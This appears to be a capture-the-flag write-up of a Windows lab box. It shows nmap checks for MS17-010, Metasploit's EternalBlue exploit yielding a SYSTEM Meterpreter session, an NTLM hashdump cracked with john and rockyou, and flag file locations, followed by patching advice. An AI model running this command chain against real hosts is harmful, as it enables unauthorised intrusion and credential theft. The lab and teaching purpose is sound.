Case file

EternalBlue SMB RCE, SYSTEM Meterpreter, and NTLM hash crack

Foundations Windows engagement: MS17-010 EternalBlue via Metasploit yielded SYSTEM; hashdump recovered Jon’s NTLM; rockyou cracked alqfna22 and located admin artifacts.

Foundations26 minWindows · SMB · Metasploit · Password Cracking
01

Engagement summary

Ports 135/139/445 and smb-vuln confirmed ms17-010. EternalBlue Meterpreter as SYSTEM dumped Jon:alqfna22 and three engagement artifacts.

BLUE was an unpatched Windows host with SMB exposed. Nmap showed three ports under 1000 (135, 139, 445); smb-vuln-* confirmed MS17-010. Metasploit exploit/windows/smb/ms17_010_eternalblue with RHOSTS set returned a shell; post/multi/manage/shell_to_meterpreter upgraded the session. hashdump listed non-default user Jon; john --format=NT cracked alqfna22. Artifacts lived at system root, under System32\config, and in Jon’s Documents.

Business impact

Internet-facing SMB with MS17-010 is ransomware-grade RCE (WannaCry class). Patch MS17-010, block 445 at the edge, and disable SMBv1. Treat any EternalBlue hit as full domain-risk until proven isolated.

02

SMB recon and EternalBlue

Vuln scan confirmed ms17-010; Metasploit EternalBlue returned a session.

OPERATOR · NMAP / MSF

savvy@lab:~$ nmap -sV --script smb-vuln* -p135,139,445 10.10.10.40

445/tcp open microsoft-ds VULNERABLE: MS17-010

savvy@lab:~$ msfconsole -q

msf6 > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(...) > set RHOSTS 10.10.10.40

msf6 exploit(...) > run

Meterpreter session 1 opened

03

Hashdump, crack, and artifact recovery

SYSTEM hashdump cracked Jon to alqfna22; search located three flags.

OPERATOR · METERPRETER

msf6 > use post/multi/manage/shell_to_meterpreter

msf6 post(...) > set SESSION 1

meterpreter > getuid

NT AUTHORITY\SYSTEM

meterpreter > hashdump

Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

savvy@lab:~$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt jon.hash

alqfna22 (Jon)

meterpreter > search -f flag*.txt

C:\flag1.txt C:\Windows\System32\config\flag2.txt C:\Users\Jon\Documents\flag3.txt

Remediation

Apply MS17-010 immediately; remove SMBv1; restrict SMB to trusted VLANs. Rotate all local passwords after a SYSTEM compromise.